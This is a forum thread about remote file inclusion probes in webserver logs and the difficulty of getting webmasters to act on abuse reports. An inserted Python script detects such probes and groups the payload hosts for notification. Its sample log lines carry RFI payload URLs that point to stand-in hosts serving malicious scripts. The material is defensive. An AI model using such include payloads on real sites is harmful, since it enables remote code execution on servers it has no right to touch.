Usually it is something like this:
123.45.678.9 - - [17/Feb/2009:02:08:21 +0100] "GET /index.php/?includepath=http://www.example.com/malicious_script.txt HTTP/1.1" 404 2608 "-" "libwww-perl/5.805"
This means there are two compromised webservers involved. One doing the request and one hosting the malicious script.
I usually don't bother with webservers in Russia or Nigeria or China, but recently I have begun to inform webmasters in other countries of the compromised servers. However, the feedback I receive is quite disillusioning.
Either the webmaster
- has no clue of what I am talking about.
- claims that his website is secure and I must be mistaken.
- tells me the website belongs to a client and he is not responsible.
- tells me they have fixed the security hole, but when I check my logfiles the next days I find the same entries again.
- doesn't respond or react to my email at all.
What do you do in such cases? Do you even notify other webmasters about security issues on their webservers? Or simply block the IP and forget about it?
I have also found that sending emails to the email address indicated for security issues when I look up the IPs or domain names seldom triggers a response. This is usually something like abuse@example.com. It seems that many webmasters haven't even set up this email address, or it leads to an email account that is checked perhaps every two years.
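The log entry quoted above is a remote file inclusion probe: the query string carries a full URL, so one host sends the request and a second host serves the script. The following is an added example, not code from the thread, showing how a defender can pull both parties out of an Apache/nginx "combined" access log automatically: parse each line, flag any query parameter whose value is an absolute URL, and group the results by the host serving the payload, which is the list of third parties an abuse report would go to. The log lines are constructed samples modelled on the post's entry (with documentation IP ranges), and the function names are my own.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache/nginx "combined" format:
# ip identd user [time] "METHOD target PROTO" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: (?P<proto>[^"]+))?" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample lines (assumption: not real traffic), modelled on the post.
SAMPLE_LOG = """\
123.45.67.89 - - [17/Feb/2009:02:08:21 +0100] "GET /index.php/?includepath=http://www.example.com/malicious_script.txt HTTP/1.1" 404 2608 "-" "libwww-perl/5.805"
198.51.100.7 - - [17/Feb/2009:02:09:03 +0100] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.4 - - [17/Feb/2009:02:10:44 +0100] "GET /wp-content/plugins/x.php?cfg=https://cdn.example.net/shell.txt? HTTP/1.0" 200 311 "-" "libwww-perl/5.805"
"""


def parse_line(line):
    """Split one combined-format line into named fields, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def remote_includes(target):
    """Return (param, url) pairs whose value is an absolute http(s)/ftp URL.

    A legitimate application rarely accepts a full URL in a query parameter,
    so this is the signature of a remote file inclusion attempt.
    """
    query = urlsplit(target).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        if re.match(r'(?i)^(https?|ftp)://', value):
            hits.append((name, value))
    return hits


def scan(log_text):
    """Walk the log and record requester, payload host and context for each hit."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue  # skip malformed or non-combined lines
        for param, url in remote_includes(rec["target"]):
            findings.append({
                "requester": rec["ip"],             # the server sending the probe
                "host": urlsplit(url).hostname,      # the server hosting the script
                "param": param,
                "url": url,
                "status": int(rec["status"]),        # 404 here: the target file did not exist
                "ua": rec["ua"],
                "time": rec["time"],
            })
    return findings


def abuse_summary(findings):
    """Group hits by payload host: each key is a third party to notify,
    with the requesting IPs seen using it."""
    by_host = {}
    for f in findings:
        by_host.setdefault(f["host"], set()).add(f["requester"])
    return {host: sorted(ips) for host, ips in by_host.items()}


if __name__ == "__main__":
    for host, ips in abuse_summary(scan(SAMPLE_LOG)).items():
        print(f"{host}: payload requested by {', '.join(ips)}")
```

The summary keeps the requesting IP and the hosting domain separate because, as the post notes, they are usually two different compromised machines and need two different notifications; the recorded status code lets you distinguish a blind probe (404) from a request that actually reached a vulnerable script.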
On the other hand, a lot of us have seen so many fake "warnings" emailed over the years that the instinct would be to zap such a message, especially if there were multiple addresses.
That may of course be part of the problem, at least with those who don't react at all. If I received an email with a subject like "Your webserver has been compromised" or "Security problem on your webserver", I'd probably dump it into the junk folder without looking at the message.